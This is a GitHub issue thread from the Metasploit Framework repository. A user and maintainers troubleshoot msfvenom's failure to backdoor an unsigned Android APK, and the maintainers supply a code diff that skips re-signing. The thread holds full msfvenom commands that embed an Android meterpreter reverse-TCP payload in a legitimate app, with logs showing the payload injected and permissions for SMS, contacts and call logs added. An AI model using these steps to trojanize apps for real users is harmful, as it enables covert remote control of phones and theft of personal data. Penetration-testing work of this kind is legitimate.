search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.14k stars 13.98k forks source link

Could not extract signing certificate owner: DOES NOT VERIFY #17610

Closed Drjacky closed 1 year ago

Drjacky commented 1 year ago

Summary

Could not extract signing certificate owner: DOES NOT VERIFY

Relevant information

➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Using APK template: /Users/userrrr/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

I pulled the apk from the device and it's a working APK; I can install and run it without an issue.

github-actions[bot] commented 1 year ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

gwillcox-r7 commented 1 year ago

Hmm its possible this may be the issue the file is denoted to be a signed file somehow and when it goes to try resign the APK, it first off couldn't extract the signing certificate owner, and then it went to the https://sourcegraph.com/github.com/rapid7/rex/-/blob/lib/rex/zip/jar.rb?L167-169&subtree=true it couldn't find the META-INF/MANIFEST.MF file to sign the file again properly.

That being said without the APK file and a way to replicate your results all I'm doing at this point is pure speculation until we have something where we are able to replicate the issue. Is there a way you could share the APK you found is causing this issue for you?

bcoles commented 1 year ago

Which APK are you using?

What is the output of:

keytool -J-Duser.language=en -printcert -jarfile ~/Desktop/ttt.apk
apksigner verify --print-certs ~/Desktop/ttt.apk
Drjacky commented 1 year ago

@bcoles

➜ ~ keytool -J-Duser.language=en -printcert -jarfile ~/Desktop/ttt.apk Not a signed jar file

➜ ~ apksigner verify --print-certs ~/Desktop/ttt.apk DOES NOT VERIFY ERROR: Missing META-INF/MANIFEST.MF

@gwillcox-r7 Sorry, I cannot share it.

bcoles commented 1 year ago

Not a signed jar file

msfvenom does not support using unsigned APK files as templates. It assumes the file is signed.

As far as I'm aware there's no real reason that it can't support unsigned APK files. The backdoor_apk method supports unsigned APKs, but msfvenom does not first check if the APK file is signed. This was never implemented in msfvenom as it was a less common use case.

As a simple workaround, you could try bypassing the certificate parsing and re-signing code in lib/msf/core/payload/apk.rb. The easiest approach is to simply force signature to false in the call to the backdoor_apk method:

diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index b70d813f56..79315f7cce 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -409,7 +409,7 @@ module Msf
         end
         cli_print "Using APK template: #{template}"
         apk_backdoor = ::Msf::Payload::Apk.new
-        raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
+        raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload, signature = false)
         gen_payload = raw_payload
       else
         if payload_module.is_a?(Msf::Payload::Windows::PayloadDBConf)

A quick test shows msfvenom generates an unsigned APK successfully with this change when given both a signed or unsigned APK as input. But I haven't tested whether the generated APK works.

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.sec.android.app.sbrowser.ethct
[*] Loading /tmp/d20230221-2805087-tkbl0x/original/smali/com/sec/android/app/sbrowser/SBrowserApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230221-2805087-tkbl0x/output.apk
Payload size: 76160321 bytes
Saved as: asdf.apk

# file asdf.apk 
asdf.apk: Zip archive data, at least v2.0 to extract, compression method=deflate

# apksigner verify --print-certs asdf.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

# keytool -J-Duser.language=en -printcert -jarfile asdf.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Not a signed jar file

Let me know if this worksand I'll add supporting unsigned APKs to my TODO list.

Drjacky commented 1 year ago

@bcoles I added , signature = false) to /opt/homebrew/share/metasploit-framework/lib/msf/core/payload_generator.rb -> raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload and got this:

➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk

Using APK template: /Users/userrrr/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF
bcoles commented 1 year ago

Are you using two different versions of Metasploit? It looks like you're running ./msfvenom from within a git repository, but updated the library in /opt/homebrew.

Drjacky commented 1 year ago

No, all of them are in /opt/homebrew/share/metasploit-framework/ as I have this in my zshrc:

eval "$(rbenv init - zsh)"
alias msfconsole="/opt/homebrew/share/metasploit-framework && ./msfconsole && cd -"
alias msfbinscan="/opt/homebrew/share/metasploit-framework && ./msfbinscan && cd -"
alias msfd="/opt/homebrew/share/metasploit-framework && ./msfd && cd -"
alias msfelfscan="/opt/homebrew/share/metasploit-framework && ./msfelfscan && cd -"
alias msfmachscan="/opt/homebrew/share/metasploit-framework && ./msfmachscan && cd -"
alias msfpescan="/opt/homebrew/share/metasploit-framework && ./msfpescan && cd -"
alias msfrop="/opt/homebrew/share/metasploit-framework && ./msfrop && cd -"
alias msfrpc="/opt/homebrew/share/metasploit-framework && ./msfrpc && cd -"
alias msfrpcd="/opt/homebrew/share/metasploit-framework && ./msfrpcd && cd -"
alias msfupdate="/opt/homebrew/share/metasploit-framework && ./msfupdate && cd -"
alias msfvenom="/opt/homebrew/share/metasploit-framework && ./msfvenom && cd -"
bcoles commented 1 year ago

No, all of them are in /opt/homebrew/share/metasploit-framework/ as I have this in my zshrc:

Do you have two copies of Metasploit? Have you edited the correct file for the version of Metasploit you're executing?

Drjacky commented 1 year ago

No, only one. Yes, I double checked:

Screenshot 2023-02-24 at 16 36 22 Screenshot 2023-02-24 at 16 36 40

After editing the file, should I make/install/do something before using the msfvenom?

Drjacky commented 1 year ago

Running it like: bundle exec ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk worked. Thanks!

But anyway it failed:

[*] Rebuilding apk with meterpreter injection as /var/folders/4c/13yp5nx15q1_vfhb_cswvjt00000gn/T/d20230224-8812-glgijc/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/annotation/InspectableProperty$ValueType;->values()[Landroidx/annotation/InspectableProperty$ValueType;
    at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
    at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
    at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
    at brut.androlib.Androlib.buildSources(Androlib.java:368)
    at brut.androlib.Androlib.build(Androlib.java:320)
    at brut.androlib.Androlib.build(Androlib.java:287)
    at brut.apktool.Main.cmdBuild(Main.java:263)
    at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x2
    at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
    at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
    ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65538
    at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
    at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
    at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
    ... 11 more

Error: apktool execution failed
gwillcox-r7 commented 1 year ago

Crashes in apktool should probably be reported to https://github.com/iBotPeaches/Apktool. Good to know you managed to get this working on the msfvenom side of things though.

Drjacky commented 1 year ago

I'm gonna report it there but, @bcoles already created one in this repo: https://github.com/rapid7/metasploit-framework/issues/16338

bcoles commented 1 year ago

Unsigned short value out of range

This is a known issue and won't be fixed in apktool. There is currently no intention to fix it in msfvenom either.

Drjacky commented 1 year ago

[just to help, giving an idea] These have their own decompiler: https://github.com/androguard/androguard

bcoles commented 1 year ago

The original question has been answered.

The remaining DEX limit issue is a dupe of #16338. There is currently no plan to resolve this in msfvenom. Closing.